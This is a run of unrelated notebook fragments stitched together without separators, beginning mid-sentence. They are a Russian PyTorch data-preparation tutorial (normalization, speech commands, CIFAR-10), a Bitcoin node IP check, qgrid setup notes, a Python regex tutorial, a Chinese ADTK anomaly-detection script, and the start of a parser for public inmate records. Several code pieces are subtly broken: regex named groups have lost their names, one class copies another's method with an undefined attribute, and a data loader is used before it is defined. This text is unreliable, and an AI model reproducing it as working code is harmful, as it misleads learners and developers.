еще один значения которого отличается от второго на 2 порядка for i, feature in enumerate(features): writer.add_scalars("Raw_3par",{ f_names[1]:feature[1], # malic_acid f_names[3]:feature[3], # alcalinity_of_ash f_names[12]:feature[12] # proline } ) # Добавим гистограмму для сырых данных. writer.add_histogram("1.Raw" , features[:,3]) writer.add_histogram("1.Raw" , features[:,1]) # Преобразовали данные к torch.Tensor tensor_f = torch.tensor(features) # Mini-Max нормализация # torch.min и torch.max возвращают кортежи (values, indexes) # https://pytorch.org/docs/stable/generated/torch.min.html#torch.min min_values, _ = tensor_f.min(dim=1,keepdim=True) # shape = (178,1) max_values, _ = tensor_f.max(dim=1,keepdim=True) # shape = (178,1) # Вычитаем минимальное значение min_max_centered = tensor_f - min_values # Делим на среднее min_max_normalized = min_max_centered / (max_values - min_values) writer.add_histogram("2.Min_Max_Centered" , min_max_centered[:,3]) writer.add_histogram("2.Min_Max_Centered" , min_max_centered[:,1]) writer.add_histogram("2.Min_Max_Normalized" , min_max_normalized[:,3]) writer.add_histogram("2.Min_Max_Normalized" , min_max_normalized[:,1]) # Стандартизация / Z-нормализация # Вычитаем среднее centered = tensor_f - tensor_f.mean(dim=0) # Разделим на стандартное отклонение normalized = centered / tensor_f.std(dim=0) # Добавим гистограмму для стандартизированных данных в Tensorboard writer.add_histogram("3.Centered" , centered[:,3]) writer.add_histogram("3.Centered" , centered[:,1]) writer.add_histogram("3.Normalized" , normalized[:,3]) writer.add_histogram("3.Normalized" , normalized[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , features[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , min_max_normalized[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , normalized[:,1]) writer.close()1. После загрузки Tensorboard выберите пункт меню "SCALARS"затем 'Horizontal Axis' = RelativeЗначения в разных масштабах - несравнимы между собой 2. выберите пункт меню "HISTOGRAMS"затем Offset time axis = WALL или RELATIVEНаглядное приемущество Стандартизации перед max-min нормализацией 1.5.4 ОбучениеБазовая документацияhttps://scikit-learn.org/stable/modules/svm.htmlПример использования SVM классификатораhttps://www.datacamp.com/community/tutorials/svm-classification-scikit-learn-python# Split data from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(features, class_labels, test_size=0.2) # 80% training and 20% test print("X_train",X_train.shape) print("X_test",X_test.shape)№ 1.5.5 Обучим модель и посчитаем точность (Accuracy)from sklearn import svm from sklearn import metrics # Создаем модель lin_clf = svm.LinearSVC() # Обучаем модель на части данных lin_clf.fit(X_train, y_train) # Получаем предсказания y_pred = lin_clf.predict(X_test) print("y_pred",y_pred.shape) print("Accuracy:",metrics.accuracy_score(y_test, y_pred))Аналогичным образом можно работать с различными типами данных **Загрузка даннных.**В Pytorch есть три библиотеки для работы с разными типами данных:[torchvision](https://pytorch.org/docs/stable/torchvision/datasets.html)[torchaudio](https://pytorch.org/audio/stable/datasets.html)[torchtext](https://pytorch.org/text/stable/index.html)Для загрузки данных используются классы [Dataset](https://pytorch.org/docs/stable/data.htmltorch.utils.data.Dataset) и [Dataloader](https://pytorch.org/docs/stable/data.htmltorch.utils.data.DataLoader). Они предоставляют единый интерфейс для доступа к данным различных типов. Пример загрузки аудио средствами Pytorch Установим библиотеку torch.audio она не входит в список пакетов доступных в colab по умолчанию.!pip install torchaudioЗагрузим датасетSpeech Commands: A Dataset for Limited-Vocabulary SpeechRecognitionhttps://arxiv.org/pdf/1804.03209.pdfhttps://pytorch.org/audio/stable/datasets.htmlspeechcommandsДанные будут распакованны в папку sample_dataimport torchaudio speech_commands_dataset = torchaudio.datasets.SPEECHCOMMANDS("sample_data",download = True)Объект speech_commands_dataset - это экземпляр класса который является наследником [torch.utils.data.Dataset](https://pytorch.org/docs/stable/data.html) это означает что в нем реализованы методы * __getitem__ * __len__Благодаря этому, мы можем узнать количество элементов или получить произвольный элемент данных обращаясь к объекту класса Dataset так же как к обычному списку в python.print("Количество элементов {} ".format(len(speech_commands_dataset))) print("Первый элемент",speech_commands_dataset[0])Что представляет из себя элемент аудио - данных?Обратимся к документации: https://pytorch.org/audio/stable/datasets.htmlspeechcommands... returns: (waveform, sample_rate, label, speaker_id, utterance_number)utterance_number - номер повтора. Больше нуля если один и тот же человек проговаривает одну и ту же фразу несколько раз.waveform, sample_rate, label, speaker_id, utterance_number = speech_commands_dataset[0] print("Waveform: {}\nSample rate: {}\nLabel: {} \nSpeaker_id: {} \nutterance_number: {}".format(waveform.shape, sample_rate, label,speaker_id,utterance_number))Размеры тензора waveform: [1, 16000] 1- количество каналов, 16000 количество измерений в секундуЕсли частота дискретизации(sample_rate) равна 16000 то этот фрагмент занимает ровно 1 секунду Визуализируем их:x - времяy - давлениеimport matplotlib.pyplot as plt print(type(waveform)) plt.figure() plt.title(f"Label: {label}") plt.plot(waveform.t().numpy())Озвучим:import IPython.display as ipd ipd.Audio(waveform.numpy(), rate=sample_rate)Итерация по датасету.Для начала запустим простую проверку: убедимся что все записи одинаковой длины. Почему это важно* list* numpy - массив* torch.tensor Проверим что все записи имеют одинаковую длину.import torch def_length = 16000 for i, sample in enumerate(speech_commands_dataset): waveform, sample_rate, label, speaker_id, utterance_number = sample if def_length != waveform.shape[1]: # [1, 16000] print(i) print("Waveform: {}\nSample rate: {}\nLabel: {} \nSpeaker_id: {} \nutterance_number: {}".format(waveform.shape, sample_rate, label,speaker_id,utterance_number)) break if not i% 10000 and i > 0 : print(f"Processed {i} objects")Если не все элементы будут иметь различную длину мы не сможем их сравнивать. И даже технически поместить в один массив. Необходомо их выровнять. Так как многие записи начинаются и заканчиваются тишиной, то просто дополним их нулями.Для этого применим концепцию трансформаций (transform) которая широко применяется в Pytorch и встраивается во многие датасеты.import torchaudio class PadWaveform(torch.nn.Module): def __init__(self, desired_size = 16000): self.desired_size = desired_size super().__init__() # in nn.Module forward method called inside __call__ method def forward(self, waveform): if waveform.shape[1] < self.desired_size: diff = self.desired_size - waveform.shape[1] pad_left = diff // 2 pad_right = diff - pad_left return torch.nn.functional.pad(waveform,[pad_left, pad_right]) else: return waveform class customSpeechCommandsDataset(torchaudio.datasets.SPEECHCOMMANDS): def __init__(self,transform,root = "sample_data"): self.transform = transform super().__init__(root) # Override def __getitem__(self,n): waveform, sample_rate, label, speaker_id, utterance_number = super().__getitem__(n) transformed_waveform = self.transform(waveform) return (transformed_waveform, sample_rate, label, speaker_id, utterance_number) speech_commands_dataset = customSpeechCommandsDataset(transform = torch.nn.Sequential(PadWaveform(16000)))Теперь можно добавлять дополнительные трансформации. Например уменьшить частоту дискретизации (sample_rate) что бы данные занимали меньше места.Для этого в модуле:[torchaudio.transforms](https://pytorch.org/audio/stable/transforms.htmlresample) уже есть готовая трансформацияfrom torchaudio.transforms import Resample speech_commands_dataset = customSpeechCommandsDataset(transform = torch.nn.Sequential( Resample(16000,8000), PadWaveform(8000)) )Визуализируем данныеДатасет в архиве занимает > 2Gb и это далеко не предел. Поэтому работать с ним будем по частям. Для этой задачи в pytorch используется класс Dataloader. Одной из его функций является пакетная(batch) загрузка данных. Особенно она будет полезна при обучении.from torch.utils.tensorboard import SummaryWriter import numpy data_loader = torch.utils.data.DataLoader(speech_commands_dataset, batch_size=512, shuffle=True) writer = SummaryWriter(comment = "commands") for i, batch in enumerate(data_loader): waveforms, sample_rates, labels, speaker_ids, utterance_numbers = batch print(waveforms.shape) print(labels) # Данные преобразовались в тензоры # Убираем 1-е измерение оставшееся от канала writer.add_embedding(torch.squeeze(waveforms), metadata=labels ) break writer.close()Запустим Tensorboardreinit_tensorboard(False)Надо ли нормализовать эти данные?Загрузим значения 2-х произвольных признаков в Tensorboard b проверим.writer = SummaryWriter(comment = "commands") for i, batch in enumerate(data_loader): waveforms, sample_rates, labels, speaker_ids, utterance_numbers = batch writer.add_histogram("waves" ,torch.squeeze(waveforms)[:,100]) writer.add_histogram("waves" ,torch.squeeze(waveforms)[:,200]) break writer.close()Как видно из гистограммы, данные уже центрированны вкруг нуля и имеют один масшаб. Отчасти это связанно с тем что что они имеют одну и ту же природу, отчасти с форматом хранения звука. ОбучениеДля обучения потребуются метки. Попутно избавимся от лишнего. Создадим очередную трансформацию.class ClassName2Num(torch.nn.Module): def __init__(self): super().__init__() def forward(self, waveform): if waveform.shape[1] < self.desired_size: diff = self.desired_size - waveform.shape[1] pad_left = diff // 2 pad_right = diff - pad_left return torch.nn.functional.pad(waveform,[pad_left, pad_right]) else: return waveform class customSpeechCommandsDatasetFinal(customSpeechCommandsDataset): def __init__(self,transform = torch.nn.Sequential(),root = "sample_data"): super().__init__(transform,root) self.labels = self.get_labels() def get_labels(self): labels = set() for i in range(len(self)): item = super(customSpeechCommandsDataset,self).__getitem__(i) labels.add(item[2]) return sorted(list(labels)) # Override def __getitem__(self,n): waveform, sample_rate, label, speaker_id, utterance_number = super().__getitem__(n) return (waveform[0],self.labels.index(label)) speech_commands_dataset = customSpeechCommandsDatasetFinal(transform = torch.nn.Sequential( Resample(16000,8000), PadWaveform(8000)) ) print("Classes",speech_commands_dataset.labels) print("Classes num",len(speech_commands_dataset.labels)) wave, cls_num = speech_commands_dataset[0] print(wave.shape)Разделим данные на обучающую и валидационную выборкиtotal_len = len(speech_commands_dataset ) print("Total length",total_len) val_len = int(total_len*0.1) train_set, val_set = torch.utils.data.random_split(speech_commands_dataset, [total_len - val_len, val_len]) import numpy from sklearn import metrics from sklearn.linear_model import SGDClassifier def validate(model): data_loader = torch.utils.data.DataLoader(val_set, batch_size=1000, shuffle=False) accuracy = [] for batch in data_loader: waveforms, class_nums = batch y_pred = model.predict(waveforms) accuracy.append(metrics.accuracy_score(class_nums, y_pred)) print("Accuracy:",numpy.array(accuracy).mean()) model = SGDClassifier(loss='log') data_loader = torch.utils.data.DataLoader(train_set, batch_size=20000, shuffle=True) for batch in data_loader: waveforms, class_nums = batch model.partial_fit(waveforms, class_nums,range(35)) validate(model)Точность низкая. Для работы с этими данными нужна глубокая модель.С ее помощью можно получить точность >85%:[Speech Command Recognition with torchaudio](https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/d87597d0062580c9ec699193e951e3f4/speech_command_recognition_with_torchaudio.ipynbscrollTo=tl9K6deU4S10) Место для рассказа про то чем строка в таблице принципиально отличается от аудиозаписи.....Вероятно тут стоит добавить несколько картинок.....* 1D - Таблица (столбцы не упорядоченны)* 2D - Аудио (данные упорядоченны по времени)* 3D - Монохромные изображения* 4D - Цветные изображения, монохромные 3-х мерные изображения (МРТ)* 5D - Видео, Воксельные изображения* 6D - 3-мерное видео Работа с изображениями Загрузим датасет CIFAR-10. Он состоит из 60000 цветных изображений размером 32x32. На картинках объекты 10 классов. В отличие от torchaudio пакет torchvision при помощи которого загружается датасет входит в число предустановленных в colab.Датасеты из torcvision изначально поддерживают механизм transforms - нам не придется добавлять их вручную.Равно как и разбивку на тестовое и проверочные подмножества.from torchvision import models, datasets, transforms from torch.utils.data import DataLoader trainset = datasets.CIFAR10("content", train=True, download=True) valset = datasets.CIFAR10("content", train = False, download=True)Выведем несколько картинок вместе с метками. Tensorboard имееи метод для вывода кртинок:[torchvision.utils.make_grid](https://pytorch.org/docs/stable/torchvision/utils.html)Однако он не поддерживает метки.https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjcxcStpNDtAhWllYsKHa7XDLoQFjAAegQIBBAC&url=https%3A%2F%2Fdiscuss.pytorch.org%2Ft%2Fadd-label-captions-to-make-grid%2F42863&usg=AOvVaw19bkv0_Q8VQxD7WBZ3pFR_Поэтому воспользуемся matplotlibimport matplotlib.pyplot as plt import numpy as np import pickle plt.rcParams["figure.figsize"] = (20,10) # Загрузим названия классов. Исключительно для наглядности, для обучения модели они не нужны. with open("content/cifar-10-batches-py/batches.meta",'rb') as infile: cifar_meta = pickle.load(infile) labels = cifar_meta['label_names'] for j in range(10): image, class_num = trainset[j] plt.subplot(1, 10 ,j+1) plt.imshow(image) plt.axis('off') plt.title(labels[class_num])Посмотрим в каком виде храниться картинка в памятиtrainset[0]Оказывается в формате [PIL](https://pillow.readthedocs.io/en/stable/reference/Image.html)Что бы обучать модель нам придется преобразовать их в тензоры. Используем для этого transforms и Dataloder.Выведем размеры получившихся тензоров:from torch.utils.data import DataLoader valset.transform = transforms.Compose([ transforms.ToTensor(), ]) # PIL Image to Pytorch tensor val_dataloder = DataLoader(valset, batch_size=8, shuffle=False) for batch in train_dataloder: images, class_nums = batch print(len(batch)) print("Images: ",images.shape) print("Class nums: ",class_nums.shape) breakРазберемся с размерностями:на каждой итерации dataloader возвращает кортеж из двух элементов.Первый это изображения, второй метки классов.Количество элементов в каждом равно batch_size (8)Изображение:3 - C, каналы (В отличие от PIL и OpenCV они идут сначала)32 - H, высота32 - W, ширина Метки:числа от 0 до 9 по количеству классов: Создадим модель - заглушку. Она не будет ничего предсказывать, только возвращать случайный номер класса.В методе fit данные просто запоминаются. Этот фрагмент кода можно будет использовать при выполнении практического задания.import torch class FakeModel(torch.nn.Module): def __init__(self): super().__init__() self.train_data = None self.train_labels = None def fit(self,x,y): self.train_data = torch.vstack((self.train_data,x)) if self.train_data != None else x self.train_labels = torch.hstack((self.train_labels,y)) if self.train_labels != None else y def forward(self,x): class_count = torch.unique(self.train_labels).shape[0] class_num = torch.randint(low = 0, high = class_count-1, size = (x.shape[0],)) return class_numЗапустим процесс обученияtrainset.transform = transforms.Compose([ transforms.ToTensor(), ]) # PIL Image to Pytorch tensor train_dataloder = DataLoader(trainset, batch_size=1024, shuffle=True) model = FakeModel() for img_batch, labels_batch in train_dataloder: model.fit(img_batch, labels_batch)Проверим работу модели на нескольких изображениях из тестового набора данныхimg_batch, class_num_batch = next(iter(val_dataloder)) predicted_cls_nums = model(img_batch) for i, predicted_cls_num in enumerate(predicted_cls_nums): img = img_batch[i].permute(1,2,0).numpy()*255 plt.subplot(1, len(predicted_cls_nums),i+1) plt.imshow(img.astype(int)) plt.axis('off') plt.title(labels[int(predicted_cls_num)])Посчитаем точностьfrom sklearn.metrics import accuracy_score accuracy = [] for img_batch, labels_batch in val_dataloder: predicted = model(img_batch) batch_accuracy = accuracy_score(labels_batch, predicted) accuracy.append(batch_accuracy) print("Accuracy",torch.tensor(accuracy).mean())unreachable_ip_set = set(unreachable_ips)bitnodes_ip_set = set(bitnodes_ips)intersection = unreachable_ip_set.intersection(bitnodes_ip_set)print(intersection)print(f"unreachable={len(unreachable_ip_set)} in_bitnodes={len(intersection)}") from ibd import utils results = [] errors = [] for ip in intersection: try: vm = utils.get_version_message((ip, 8333)) results.append(vm) except Exception as e: errors.append(e) print(f"{len(results)}/{len(results)+len(errors)}") import json json.dumps(list(intersection)) open("good-addrs-that-fail.json", "w").write(json.dumps(list(intersection))) json.loads(open("good-addrs-that-fail.json", "r").read()) "2001:0:ca62:187d:10ea:2b7a:3f57:fe95" in bitnodes_ipsqgridhttps://github.com/quantopian/qgrid how to install qgrid for jupyterNotebook (not jupyterLab)`pip install qgrid``jupyter nbextension enable --py --sys-prefix qgrid``jupyter nbextension enable --py --sys-prefix widgetsnbextension` populate example data and show qgridimport qgrid import pandas as pd import numpy as np df_types = pd.DataFrame({ 'A' : pd.Series(['2013-01-01', '2013-01-02', '2013-01-03', '2013-01-04', '2013-01-05', '2013-01-06', '2013-01-07', '2013-01-08', '2013-01-09'],index=list(range(9)),dtype='datetime64[ns]'), 'B' : pd.Series(np.random.randn(9),index=list(range(9)),dtype='float32'), 'C' : pd.Categorical(["washington", "adams", "washington", "madison", "lincoln","jefferson", "hamilton", "roosevelt", "kennedy"]), 'D' : ["foo", "bar", "buzz", "bippity","boppity", "foo", "foo", "bar", "zoo"] }) df_types['E'] = df_types['D'] == 'foo' qgrid.set_grid_option('maxVisibleRows', 10) # can easily view ~1 million rows qgrid_widget = qgrid.show_grid(df_types, show_toolbar=True) qgrid_widgetget changed dfqgrid_widget.get_changed_df()show nan and Noneimport pandas as pd import numpy as np import qgrid df = pd.DataFrame([(pd.Timestamp('2017-02-02'), None, 3.4), (np.nan, 2, 4.7), (pd.Timestamp('2017-02-03'), 3, None)]) qgrid.show_grid(df)Introduction to Python Regex ModuleIn this notebook, we explore regex module functions and capabilitieshttps://docs.python.org/3/library/re.htmlimport re # python regex moduleRaw String and Regular StringAlways use Raw string for Regex Patterns# regular string. embedded special characters are intrepreted by python s = 'a\tb' # raw string. python does not interpret the content of the string. # USE RAW STRING FOR REGEX PATTERNS sr = r'a\tb' print('regular string:', s) print() print('raw string:', sr)re.match - Find first matchFind match at the beginning of a stringUseful for strict validation - for example, validating input from userspattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits text = "42 is my lucky number" match = re.match(pattern,text) # check if match was successful if match: print (match.group(0)) else: print ("No match") pattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits # number is not at the beginning. So, this match will fail text = "my lucky number is 42" match = re.match(pattern, text) if match: print(match.group(0)) else: print("No Match")input validationdef is_integer(text): # Pattern 1 # \d = digit # \d+ = one or more digits # pattern = r"\d+" # Pattern 2 # $ = end of string or line # one or more digits. followed by end of string or line # not cross-platform. works only with match method # pattern = r"\d+$" # Pattern 3 # start of string or line. followed by one or more digits. followed by end of string or line # ^ = start of string or line. # $ = end of string or line # cross-platform pattern = r"^\d+$" match = re.match(pattern, text) if match: return True else: return False is_integer("1234")Unit Testdef test_is_integer(): pass_list = ["123","","900","0991"] fail_list = ["a123","124a","1 2 3","1\t2"," 12","45 "] for text in pass_list: if not is_integer(text): print('\tFailed to detect an integer',text) for text in fail_list: if is_integer(text): print('\tIncorrectly classified as an integer',text) print('Test complete') test_is_integer()re.search - Find the first match anywherepattern = r"\d+" # one or more digits text = "42 is my lucky number" match = re.search(pattern,text) # check if match was successful if match: print('Found a match:', match.group(0), 'at index:', match.start()) else: print ("No match") pattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits # search method will look for the first match anywhere in the text text = "my lucky number is 42" match = re.search(pattern, text) if match: print('Found a match:',match.group(0), 'at index:', match.start()) else: print("No Match") # But, it finds only the first match in the text pattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits # search method will look ONLY for the first match anywhere in the text text = "my lucky numbers are 42 and 24" match = re.search(pattern, text) if match: print('Found a match:',match.group(0), 'at index:', match.start()) else: print("No Match")TODO: Modify is_integer to use search method re.findall - Find all the matchesmethod returns only after scanning the entire text# Find all numbers in the text pattern = r"\d+" text = "NY Postal Codes are 10001, 10002, 10003, 10004" print ('Pattern',pattern) # successful match match = re.findall(pattern, text) if match: print('Found matches:', match) else: print("No Match")re.finditer - Iteratormethod returns an iterator with the first match and you have control to ask for more matchespattern = r"\d+" text = "NY Postal Codes are 10001, 10002, 10003, 10004" print ('Pattern',pattern) # successful match match_iter = re.finditer(pattern, text) print ('Matches') for match in match_iter: print('\t', match.group(0), 'at index:', match.start())groups - find sub matches group 0 = refers to the text in a string that matched the patterngroup 1..n onwards refer to the sub-groups# Separate year, month and day # 1. pattern = r"\d+" # 2. pattern = r"\d{4}\d{2}\d{2}" # 3. pattern = r"(\d{4})(\d{2})(\d{2})" pattern = r"(\d{4})(\d{2})(\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('Groups', match.groups()) for idx, value in enumerate(match.groups()): print ('\tGroup', idx+1, value, '\tat index', match.start(idx+1)) else: print("No Match")named groups# Separate year, month and day pattern = r"(?P\d{4})(?P\d{2})(?P\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('\t',match.groupdict()) else: print("No Match")access by group name# Separate year, month and day pattern = r"(?P\d{4})(?P\d{2})(?P\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('\tYear:',match.group('year')) print('\tMonth:',match.group('month')) print('\tDay:',match.group('day')) else: print("No Match")re.sub - find and replace two patterns: one to find the text and another pattern with replacement text# Format date # 20200920 => 09-20-2020 pattern = r"(?P\d{4})(?P\d{2})(?P\d{2})" text = "Start Date: 20200920, End Date: 20210920" # substitute with value space dollars replacement_pattern = r"\g-\g-\g" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, replacement_pattern, text) print('new text\t', new_text) # Make this an exercise # find one or more digits followed by the word dollars. capture the digits in value group pattern = r"(?P\d+)dollars" text = "movie ticket: 15dollars. popcorn: 8dollars" # substitute with value space dollars replacement_pattern = r"\g dollars" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, replacement_pattern, text) print('new text\t', new_text)custom function to generate replacement text# Format # 20200920 => Sep-20-2020 import datetime def format_date(match): in_date = match.groupdict() year = int(in_date['year']) month = int(in_date['month']) day = int(in_date['day']) #https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior return datetime.date(year,month,day).strftime('%b-%d-%Y') # Format date pattern = r"(?P\d{4})(?P\d{2})(?P\d{2})" text = "Start Date: 20200920, End Date: 20210920" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, format_date, text) print('new text\t', new_text) # Make this an assignment def celsius_to_fahrenheit(match): degCelsius = float(match.group("celsius")) degF = 32.0 + (degCelsius * 9.0 / 5.0); return '{0}°F'.format(degF); def substitution_example_custom_logic(): pattern = r"(?P\d+)\u00B0C" text = "Today's temperature is 25°C" print ('Pattern: {0}'.format(pattern)) print ('Text before: {0}'.format(text)) new_text = re.sub(pattern, celsius_to_fahrenheit, text) print('Text after: {0}'.format(new_text)) substitution_example_custom_logic()re.split - split text based on specified patternpattern = r"," text = "a-c,x,y,1" re.split(pattern,text)输入单个文件, 手工设置模型类型, 输出import numpy as np import pandas as pd from plotly.subplots import make_subplots import sys import os # import detector from adtk.visualization import plot from adtk.data import validate_series from adtk.detector import LevelShiftAD, PersistAD, SeasonalAD, VolatilityShiftAD from adtk.aggregator import OrAggregatorSet directories for data# file for drive def filepathRZ(option=1): if option ==1: DATA_FOLDER="/content/drive/MyDrive/for_students/data_v1/training/" DATA_FOLDER2="/content/drive/MyDrive/for_students/data_v1/" DATA_FOLDER3="/content/drive/MyDrive/for_students/data_v2/training/" DATA_FOLDER4="/content/drive/MyDrive/for_students/data_v2/" DATA_FOLDER5='/content/drive/MyDrive/for_students//Submission/data_v2/' return DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5 elif option==2: # file for local DATA_FOLDER = sys.path[0] + '/data_v1/training/' # v1 training数据 DATA_FOLDER2 = sys.path[0] + '/data_v1/' # v1 预测数据 DATA_FOLDER3 = sys.path[0] + '/data_v2/training/' # v2 training数据 DATA_FOLDER4 = sys.path[0] + '/data_v2/' # v2 预测数据 DATA_FOLDER5 = sys.path[0] + '/Submission/data_v2/' # 输出预测路径 return DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5 DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5= filepathRZ(2)set updef read_for_adtk( folder_name, file_name ):#读取csv文件 df = pd.read_csv('%s'%folder_name + '%s'%file_name, index_col = ['timestamp'], parse_dates=True, squeeze=True) try: df = df.drop(['request_count'], axis=1) except: print('non') return df def load_file(folder_path, file_name): df = read_for_adtk(folder_path, file_name) s_train = validate_series(df) return df, s_train from adtk.pipe import Pipenet # data 为 adtk validate_series def detect_anomaly( data, mode = 'LevelShift'): if mode == 'LevelShift': print('mode is', mode) dect = LevelShiftAD(20) elif mode == 'Persist': print('mode is', mode) dect = PersistAD(window = 1150) elif mode == 'Seasonal': print('mode is', mode) dect = SeasonalAD() elif mode == 'VolatilityShift': print('mode is', mode) dect = VolatilityShiftAD(window = 25) elif mode == 'PersistLevelShiftMixed': # detect levelshift and persist(spike) anomaly simultaneously # 为什么连接之后, 数据少了dataset4 22695->22683 steps = { 'levelshift': { 'model': LevelShiftAD(80), "input": "original" }, 'persist':{ 'model': PersistAD(window = 1150), "input": "original" }, 'mixed':{ 'model': OrAggregator(), "input": ["levelshift", "persist"] } } dect = Pipenet(steps) anomalies = dect.fit_detect(data) # plot plot(data, anomaly=anomalies, anomaly_color="red", anomaly_tag="marker") return anomalies def output_result(folder_path, file_name, original_df, anomaly, replace = False ): if replace == True: final_path = folder_path + file_name else: final_path = folder_path + 'res_' + file_name print(final_path) # 修改anomaly的名字(原先为数据名) anomaly.name = 'anomaly_label' # 填充空值 anomaly = anomaly.fillna(value = 0) print(anomaly[anomaly == '1']) # 修改为int anomaly = anomaly.astype(int) # 两表连接 anomaly = anomaly[~anomaly.index.duplicated()] original_df = original_df[~original_df.index.duplicated()] out = pd.concat([original_df, anomaly], axis = 1) # 输出 out.to_csv(final_path, index=True) def individual(folder_name, file, mode, replace, factors = []): df, s_train = load_file( DATA_FOLDER4, file) anomalies = detect_anomaly(s_train, mode ) output_result(DATA_FOLDER4, file, df, anomalies, replace) # test mode_dict = {'dataset_1.csv': 'LevelShift', 'dataset_2.csv': 'LevelShift', 'dataset_3.csv': 'LevelShift', 'dataset_4.csv': 'PersistLevelShiftMixed', 'dataset_5.csv': 'LevelShift', 'dataset_6.csv': 'LevelShift', 'dataset_7.csv': 'LevelShift', 'dataset_8.csv': 'Seasonal', 'dataset_9.csv': 'VolatilityShift', 'dataset_10.csv': 'LevelShift', 'dataset_11.csv': 'Seasonal', 'dataset_12.csv': 'VolatilityShift', 'dataset_13.csv': 'Seasonal', 'dataset_100.csv': 'LevelShift', 'dataset_101.csv': 'LevelShift', 'dataset_102.csv': 'LevelShift', 'dataset_103.csv': 'LevelShift', 'dataset_105.csv': 'LevelShift', 'dataset_106.csv': 'LevelShift', } all_files = os.listdir(DATA_FOLDER4) # four mode: LevelShift, Persist, Seasonal, VolatilityShift, PersistLevelShiftMixed for file_name in all_files: if file_name[-4:] == '.csv': print(file_name) try: mode = mode_dict[file_name] individual(DATA_FOLDER4, file_name, mode, replace = False) except: print('something wrong about', file_name) continueres_dataset_8.csv something wrong about res_dataset_8.csv res_dataset_9.csv something wrong about res_dataset_9.csv dataset_106.csv mode is LevelShift /Users/jarrywang/Documents/Job/Huawei/soybean/data_v2/res_dataset_106.csv kpi_value timestamp 2020-08-17 02:00:00+02:00 NaN 2020-08-17 02:06:00+02:00 NaN 2020-08-17 02:08:00+02:00 NaN 2020-08-17 02:09:00+02:00 NaN 2020-08-17 02:15:00+02:00 NaN ... ... 2020-08-31 01:55:00+02:00 NaN 2020-08-31 01:56:00+02:00 NaN 2020-08-31 01:57:00+02:00 NaN 2020-08-31 01:58:00+02:00 NaN 2020-08-31 02:00:00+02:00 NaN [14121 rows x 1 columns] res_dataset_102.csv something wrong about res_dataset_102.csv res_dataset_103.csv something wrong about res_dataset_103.csv dataset_105.csv mode is LevelShift /Users/jarrywang/Documents/Job/Huawei/soybean/data_v2/res_dataset_105.csv kpi_valu[...]ODOC Public Inmate DataThis notebook is intended as a start for research of the ODOC data. To use this notebook, follow the setup instructiion found [here](https://github.com/codefortulsa/odoc-parse). Then download the data published [here](http://doc.publishpath.com/odoc-public-inmate-data). Unzip the file and place the files in a subdirectory called 'data'.The set of files includes a ReadMe.txt which describes the files and their fixed formats. The sections of this notebook show description of each file and how to import it into pandas dataframes. NOTE: the widths variables differ slighty from the description to handle some difference in the data.import pandas as pdSchedule A - Profile Data Layout ``` ======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) LAST_NAME VARCHAR2(30) FIRST_NAME VARCHAR2(30) MIDDLE_NAME VARCHAR2(30) SUFFIX VARCHAR2(5) LAST_MOVE_DATE DATE 'DD-MMM-YY' (9) FACILITY VARCHAR2(40) BIRTH_DATE DATE 'DD-MMM-YY' (9) SEX VARCHAR2(1) RACE VARCHAR2(40) HAIR VARCHAR2(40) HEIGHT_FT VARCHAR2(2) HEIGHT_IN VARCHAR2(2) WEIGHT VARCHAR2(4) EYE VARCHAR2(40) STATUS VARCHAR2(10) ```file = 'data/Vendor_Profile_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_Profile_Extract_Text.dat' names = [ "DOC_NUM" ,"LAST_NAME" ,"FIRST_NAME" ,"MIDDLE_NAME" ,"SUFFIX" ,"LAST_MOVE_DATE" ,"FACILITY" ,"BIRTH_DATE" ,"SEX" ,"RACE" ,"HAIR" ,"HEIGHT_FT" ,"HEIGHT_IN" ,"WEIGHT" ,"EYE" ,"STATUS" ] widths = [ 11, 30, 30, 30, 5, 9, 40, 9, 1, 40, 40, 2, 2, 4, 40, 10 ] profile_df = pd.read_fwf(file, header=None, widths=widths, names=names) profile_df.head(20)Schedule B - Alias Data Layout```======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) LAST_NAME VARCHAR2(30) FIRST_NAME VARCHAR2(30) MIDDLE_NAME VARCHAR2(30) SUFFIX VARCHAR2(5)```file = 'data/Vendor_Alias_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_Alias_Extract_Text.dat' names = [ "DOC_NUM", "LAST_NAME", "FIRST_NAME", "MIDDLE_NAME", "SUFFIX" ] widths = [ 11, 30, 30, 30, 5 ] alias_df = pd.read_fwf(file, header=None, widths=widths, names=names) alias_df.head(20)Schedule C - Sentence Data Layout```=======================================================Incarcerated_Term_In_Years = 9999 indicates a death sentenceIncarcerated_Term_In_Years = 8888 indicates a life without parole sentenceIncarcerated_Term_In_Years = 7777 indicates a life sentence======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) STATUTE_CODE NOT NULL VARCHAR2(40) SENTENCING_COUNTY VARCHAR2(40) JS_DATE DATE 'YYYYMMDD' (8) 